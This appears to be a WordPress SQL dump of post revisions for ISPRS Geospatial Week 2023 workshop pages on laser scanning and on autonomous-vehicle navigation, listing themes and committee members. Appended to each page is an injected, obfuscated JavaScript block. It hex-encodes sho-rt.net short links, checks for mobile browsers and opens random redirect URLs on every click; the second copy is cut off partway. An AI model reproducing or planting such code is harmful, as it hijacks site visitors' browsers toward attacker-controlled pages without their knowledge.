(3924,1,'2023-03-03 17:22:13','2023-03-03 17:22:13','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Laser Scanning 2023</strong></span></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"54\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n<p>•      Airborne, terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><strong>Organizing Committee:</strong></p>\n<p>Jan Boehm (WG II/2), UCL, United Kingdom</p>\n<p>Bisheng Yang (WG II/2), LIESMARS, Wuhan University, China</p>\n<p>Martin Weinmann, KIT, Germany</p>\n<p>Katharina Anders,  Heidelberg University</p>\n<p>Ruisheng Wang, University of Calgary</p>\n<p>&nbsp;</p>\n<p><strong>Scientific Committee (to be confirmed):</strong></p>\n<p style=\"font-weight: 400;\">Ahmad Baik (King Abdul Aziz University, Saudi Arabia)</p>\n<p style=\"font-weight: 400;\">Andreas Mayr (University of Innsbruck, Austria)</p>\n<p style=\"font-weight: 400;\">Antero Kukko (Finnish Geospatial Research Institute, Finland)</p>\n<p style=\"font-weight: 400;\">Bernhard Höfle (Heidelberg University, Germany)</p>\n<p style=\"font-weight: 400;\">Camillo Ressl (TU Vienna, Austria)</p>\n<p style=\"font-weight: 400;\">Christoph Holst (TU Munich, Germany)</p>\n<p style=\"font-weight: 400;\">Daniel Wujanz (Technet, Germany)</p>\n<p style=\"font-weight: 400;\">David Belton (Curtin University, Australia)</p>\n<p style=\"font-weight: 400;\">David Griffiths (Apple, US)</p>\n<p style=\"font-weight: 400;\">Dong Zhen (Wuhan University, China)</p>\n<p style=\"font-weight: 400;\">Fabio Panella (Arup, UK)</p>\n<p style=\"font-weight: 400;\">Fabio Menna (Bruno Kessler Foundation, Italy)</p>\n<p style=\"font-weight: 400;\">Florent Poux (University of Liège, Belgium)</p>\n<p style=\"font-weight: 400;\">Francesco Pirotti (University of Padova, Italy)</p>\n<p style=\"font-weight: 400;\">Franz Rottensteiner (Leibniz Universität Hannover, Germany)</p>\n<p style=\"font-weight: 400;\">Gottfried Mandlburger (TU Wien, Germany)</p>\n<p style=\"font-weight: 400;\">Hai Huang (Universität der Bundeswehr München, Germany)</p>\n<p style=\"font-weight: 400;\">Kourosh Khoshelham (University of Melbourne, Australia)</p>\n<p style=\"font-weight: 400;\">Luigi Barazzetti (Politechnic University of Milan, Italy)</p>\n<p style=\"font-weight: 400;\">Lukas Winiwarter (University of British Columbia, Canada)</p>\n<p style=\"font-weight: 400;\">Marcus Hebel (Fraunhofer IOSB, Germany)</p>\n<p style=\"font-weight: 400;\">Markus Gerke (TU Braunschweig, Germany)</p>\n<p style=\"font-weight: 400;\">Mat Disney (UCL, United Kingdom)</p>\n<p style=\"font-weight: 400;\">Michael Olsen (Oregon State University, USA)</p>\n<p style=\"font-weight: 400;\">Monica Herrero-Huerta (University of Salamanca, Spain)</p>\n<p style=\"font-weight: 400;\">Norbert Haala (University of Stuttgart, Germany)</p>\n<p style=\"font-weight: 400;\">Roderik Lindenbergh (TU Delft, Netherlands)</p>\n<p style=\"font-weight: 400;\">Sander Oude Elberink (ITC – University of Twente, Netherlands)</p>\n<p style=\"font-weight: 400;\">Sanna Kaasalainen (Finnish Geospatial Research Institute)</p>\n<p style=\"font-weight: 400;\">Thomas Zieher (Austrian Academy of Sciences)</p>\n<p style=\"font-weight: 400;\">Tomohiro Mizoguchi (Nihon University, Japan)</p>\n<p style=\"font-weight: 400;\">Volker Wichmann (Laserdata GmbH, Austria)</p>\n<p style=\"font-weight: 400;\">Wei Yao (Hong Kong Polytechnic University, Hong Kong)</p>\n<p style=\"font-weight: 400;\">Wen Xiao (China University of Geosciences, China)</p>\n<p style=\"font-weight: 400;\">Xinlian Liang (Finnish Geospatial Research Institute, Finland)</p>\n<p style=\"font-weight: 400;\">Yusheng Xu (TU Munich, Germany)</p>\n<p style=\"font-weight: 400;\">Zsofia Koma (Aarhus University, Denmark)</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2023-03-03 17:22:13','2023-03-03 17:22:13','',2949,'https://gsw2023.com/?p=3924',0,'revision','',0),
(3925,1,'2023-03-03 17:23:21','2023-03-03 17:23:21','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles</strong></span></h5>\n<h5></h5>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<table>\n<tbody>\n<tr>\n<td width=\"158\">Cairo Lúcio Nascimento Junior</td>\n<td width=\"267\">Professor, ITA, Brazil</td>\n</tr>\n<tr>\n<td width=\"158\">Mohamed Tamazin</td>\n<td width=\"267\">Senior GNSS Architect, Safran Navigation and Timing</td>\n</tr>\n<tr>\n<td width=\"158\">Paul Hershey</td>\n<td width=\"267\">Principal Engineering Fellow, Raytheon, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Mohamed Elhabiby</td>\n<td width=\"267\">CEO, Micro Engineering Technologies Inc.</td>\n</tr>\n<tr>\n<td width=\"158\">Caroline Channel</td>\n<td width=\"267\">Professor, ISAE-Supaero, France</td>\n</tr>\n<tr>\n<td width=\"158\">Ashraf Abosekeen</td>\n<td width=\"267\">Assistant Professor, Military Technical College, Cairo, Egypt.</td>\n</tr>\n<tr>\n<td width=\"158\">Umar Iqbal</td>\n<td width=\"267\">Associate Professor, Mississippi State University, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Amr Elwakeel</td>\n<td width=\"267\">Assistant Professor, University of Western Virginia, USA</td>\n</tr>\n<tr>\n<td width=\"158\">Peter Travis Jardine</td>\n<td width=\"267\">Adjunct Professor, Royal Military College of Canada, ON, Canada</td>\n</tr>\n</tbody>\n</table>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 